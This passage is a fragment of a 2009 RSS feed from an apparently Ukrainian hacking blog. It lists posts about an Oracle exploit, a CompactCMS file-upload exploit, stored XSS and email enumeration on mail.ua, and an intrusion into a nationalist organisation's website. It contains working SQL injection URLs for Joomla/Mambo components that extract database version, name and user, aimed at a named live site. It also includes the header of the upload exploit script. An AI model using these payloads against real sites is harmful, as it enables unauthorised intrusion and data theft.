		<category><![CDATA[Вразливості \ vulnerabilities]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[Кодинг]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[oracle]]></category>
		<category><![CDATA[PERL]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=683</guid>
		<description><![CDATA[Написав нескладний exploit, що використовує уразливість в DBMS_SQLHASH.GETHASH. Exploit для роботи потребує sql ін&#8217;єкцію в pl / sql процедурі (зазвичай, на Oracle Application server, там і належать такі процедури по дефолту користувачеві з правами, яких нам достатньо). Загалом  можна запитати, навіщо нам exploit, якщо є ін&#8217;єкція? Я відповім, що часто в таких процедурах йде простий [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/11/oracle-dbms_sqlhash-gethash-exploit-perl/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>CompactCMS Remote Arbitrary File Upload Exploit</title>
		<link>http://uasc.org.ua/2009/10/compactcms-remote-arbitrary-file-upload-exploit/</link>
		<comments>http://uasc.org.ua/2009/10/compactcms-remote-arbitrary-file-upload-exploit/#comments</comments>
		<pubDate>Thu, 15 Oct 2009 12:05:46 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[Експлоіти/Exploits]]></category>
		<category><![CDATA[CompactCMS]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Remote Arbitrary File Upload]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=604</guid>
		<description><![CDATA[Писав вже давно, лежало в RoA на античаті,  тепер думаю немає ніякого сенсу зберігати його в приваті.
http://uasc.org.ua/files/compactcms.php.txt




&#60;?php


&#160;


/**


&#160;* @Product: MMIX &#8211; CompactCMS


&#160;* @Version: 1.1.1


&#160;* @Site: CompactCMS.nl 


&#160;* @Dork: &#34;© 2009 CompactCMS&#34; &#160;


&#160;* @Found by: Dimi4 &#160;


&#160;* @Date: 8.04.2009


&#160;* &#160;@Bug Function [admin\handler.inc.php] [50-62 lines] :


&#160;* &#160;*/ 


/////////////////////////////////////////////////////////////////////


## $name &#160; &#160;&#160; &#160; = htmlentities($_GET['file']); &#160; &#160; &#160; &#160; [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/10/compactcms-remote-arbitrary-file-upload-exploit/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Вразливості компонентів Joomla/Mambo (01)</title>
		<link>http://uasc.org.ua/2009/10/%d0%b2%d1%80%d0%b0%d0%b7%d0%bb%d0%b8%d0%b2%d0%be%d1%81%d1%82%d1%96-%d0%ba%d0%be%d0%bc%d0%bf%d0%be%d0%bd%d0%b5%d0%bd%d1%82%d1%96%d0%b2-joomlamambo-01/</link>
		<comments>http://uasc.org.ua/2009/10/%d0%b2%d1%80%d0%b0%d0%b7%d0%bb%d0%b8%d0%b2%d0%be%d1%81%d1%82%d1%96-%d0%ba%d0%be%d0%bc%d0%bf%d0%be%d0%bd%d0%b5%d0%bd%d1%82%d1%96%d0%b2-joomlamambo-01/#comments</comments>
		<pubDate>Mon, 12 Oct 2009 19:06:16 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[com_nodes]]></category>
		<category><![CDATA[com_projects]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[Mambo]]></category>
		<category><![CDATA[SQL injection]]></category>
		<category><![CDATA[SQLinj]]></category>
		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=577</guid>
		<description><![CDATA[Компонент: Projects
Тип вразливості: SQL-injection
Знайдено: 27.09.2009
Знайшов: Dimi4
index?option=com_projects&#38;Itemid=62&#38;idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Приклад: http://www.inab.org/?option=com_projects&#38;Itemid=62&#38;idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
Компонент: com_nodes
Тип вразливості: SQL-injection
Знайдено: 27.09.2009
Знайшов: Dimi4 
index?option=com_nodes&#38;Itemid=61&#38;node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&#38;info=personal
Приклад: http://www.inab.org/index.php?option=com_nodes&#38;Itemid=61&#38;node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&#38;info=personal 
]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/10/%d0%b2%d1%80%d0%b0%d0%b7%d0%bb%d0%b8%d0%b2%d0%be%d1%81%d1%82%d1%96-%d0%ba%d0%be%d0%bc%d0%bf%d0%be%d0%bd%d0%b5%d0%bd%d1%82%d1%96%d0%b2-joomlamambo-01/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>активні xss на mail.ua</title>
		<link>http://uasc.org.ua/2009/10/mailua-bugs/</link>
		<comments>http://uasc.org.ua/2009/10/mailua-bugs/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 13:32:12 +0000</pubDate>
		<dc:creator>poma</dc:creator>
				<category><![CDATA[Безпека]]></category>
		<category><![CDATA[mail.ua]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=538</guid>
		<description><![CDATA[сьогодні у меня зявилася можливість протестувати цей сервіс..

результат тесту: 3 активкні xss і маленька поправка ))

почну з тої самої маленької поправки, яка не є багом, але грає не менш важливу роль:
http://mail.ua/?0.48688674658612896&#38;action=ajax_check_email&#38;email=EMAIL_NAME
змінювавши EMAIL_NAME по списку (наприклад) можна взнати які мейли вільні.
маючи базу логінів, можна організувати провірку, і зібрати базу..
рекомендація: додати провірку referer + який небудь динамічний [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/10/mailua-bugs/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Дружній взлом КУН (Конгрес Українських Націоналістів)</title>
		<link>http://uasc.org.ua/2009/09/%d0%b4%d1%80%d1%83%d0%b6%d0%bd%d1%96%d0%b9-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d0%ba%d1%83%d0%bd-%d0%ba%d0%be%d0%bd%d0%b3%d1%80%d0%b5%d1%81-%d1%83%d0%ba%d1%80%d0%b0%d1%97%d0%bd%d1%81%d1%8c%d0%ba%d0%b8/</link>
		<comments>http://uasc.org.ua/2009/09/%d0%b4%d1%80%d1%83%d0%b6%d0%bd%d1%96%d0%b9-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d0%ba%d1%83%d0%bd-%d0%ba%d0%be%d0%bd%d0%b3%d1%80%d0%b5%d1%81-%d1%83%d0%ba%d1%80%d0%b0%d1%97%d0%bd%d1%81%d1%8c%d0%ba%d0%b8/#comments</comments>
		<pubDate>Sun, 20 Sep 2009 11:14:18 +0000</pubDate>
		<dc:creator>Dimi4</dc:creator>
				<category><![CDATA[Безпека]]></category>

		<guid isPermaLink="false">http://uasc.org.ua/?p=507</guid>
		<description><![CDATA[Привіт всім) Все розпачалось з того шо побачив я лінк на сайт Конгресу Українських Націоналістів (далі КУН) http://cun.org.ua/ukr/. Трішки помучився з дирявим модулем альбому(опис на мілвормі побачив), вирішив подивитись реверс-іп. Виявилось, що на цьому самому хості є ще сайт nacija.org.ua. Все тіж націоналісти) не важко було розпізнати за УРЛом, що там стоїть джумла-мамбо) Але не [...]]]></description>
		<wfw:commentRss>http://uasc.org.ua/2009/09/%d0%b4%d1%80%d1%83%d0%b6%d0%bd%d1%96%d0%b9-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d0%ba%d1%83%d0%bd-%d0%ba%d0%be%d0%bd%d0%b3%d1%80%d0%b5%d1%81-%d1%83%d0%ba%d1%80%d0%b0%d1%97%d0%bd%d1%81%d1%8c%d0%ba%d0%b8/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
